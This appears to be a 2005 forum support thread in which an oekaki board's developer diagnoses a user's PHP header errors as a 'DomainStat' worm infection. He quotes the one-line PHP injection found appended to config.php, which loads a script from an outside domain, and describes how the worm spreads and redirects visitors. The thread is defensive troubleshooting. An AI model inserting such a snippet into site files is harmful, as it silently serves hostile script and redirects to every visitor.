NineChime forum

Furry stuff, oekaki stuff, and other stuff.

You are not logged in.

Post a reply

Write your message and submit
Options
Humanity test

What is one + ten?

Go back

Topic review (newest first)

kiwiwolf
12-10-2005 21:52:38

that would explain the random redirection to a "coolrip" music website I got...

I've stuck the patch in just now. Thank you so much!

Waccoon
12-10-2005 19:25:00

Apparently, just changing the config files isn't enough.  I've had to make a pacth to disable DomainStats altogether.  I've e-mailed it to you, so give it a try (it's just one file).  It only disables DomainStat, though.  It won't fix it.

Apparently, DomainStat is a new server worm going around.  I haven't found out too much about how it works, but it is related to either exploits in forum software, or it does manage to attack an entire server.  It uploads the file "insert.php" into a folder on the server, and runs it.  Any file accessable to PHP (CHMOD 664 or higher), will then have the DomainStat Javascript tag appended to it.  This tag is sent to a member's web browser, where more sophisticated Javascript is downloaded which sets a cookie and redirects to a pop-up or other 3rd party website.

Wacintaki is kind of small on the hacking radar, so I'm thinking this gets into servers via a more popular forum or blogging package.  WordPress and Invision Power Board are known to be vulnerable.  It's possible that Wacintaki has this vulnerability, though, so if anyone has any info on DomainStat.com, or manages to get a copy of this "insert.php" source code, that would help a lot.

People affected by this issue should ask their web hosts to look for any weird log entry concerning "insert.php".  That's the most likely entry point, as this file has to be written to the server before the exploit code can be executed.

Waccoon
12-09-2005 04:18:22

@$*&#%!!!!!!!!!

Here's the problem.  This has been added to the end of your config file:

Code:

<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>

[EDIT:  Apparently, DomainStat is a worm that hacks into servers through forums, and is not related to the server itself or your web host.  I'm looking into fixes and how this thing works.]

kiwiwolf
12-08-2005 05:48:48

If it helps, whenever I log in the status bar seems to be attempting to get information from a completely different domain - domainstat.net...

Waccoon
12-08-2005 05:42:55

Yup, that's it.  You may delete that file, BTW, since I didn't see anything unusual.

I know WHAT is causing the problem, but I don't know why.  Basicly, PHP is printing something after it parses the config file, and it shouldn't.

If you don't mind, do you think I could have a copy of your config.php file?  Send it here.

If at all possible, could you get it from your server with an FTP program in binary mode?  If you don't know how to do that, don't worry.

kiwiwolf
12-06-2005 07:04:29
Waccoon
12-06-2005 05:03:55

Wait... line 30 of config.php?  I think this is the same problem Rika is having with her board.

In the documentation folder of your Wacintaki archive, there's a file called "test_php.php".  If you could upload that to your server and let me know when it's there, I'll check out your PHP configuration.  This isn't a security issue, it just shows me what is supported in your version of PHP.

I have a feeling your sysadmin changed something in the PHP configuration recently.

kiwiwolf
12-06-2005 03:24:20

I installed Wax Poteto some time ago. The board was working perfectly fine up until a couple of days ago, but now I am receiving this error when I try to log in:

Warning: Cannot modify header information - headers already sent by (output started at /home/kiwiwolf/public_html/oekaki/config.php:30) in /home/kiwiwolf/public_html/oekaki/functions.php on line 328

Warning: Cannot modify header information - headers already sent by (output started at /home/kiwiwolf/public_html/oekaki/config.php:30) in /home/kiwiwolf/public_html/oekaki/functions.php on line 329

Warning: Cannot modify header information - headers already sent by (output started at /home/kiwiwolf/public_html/oekaki/config.php:30) in /home/kiwiwolf/public_html/oekaki/functions.php on line 33

My board is here: http://oekaki.kiwiwolf.net

Board footer

Yep, still running PunBB
© Copyright 2002–2008 PunBB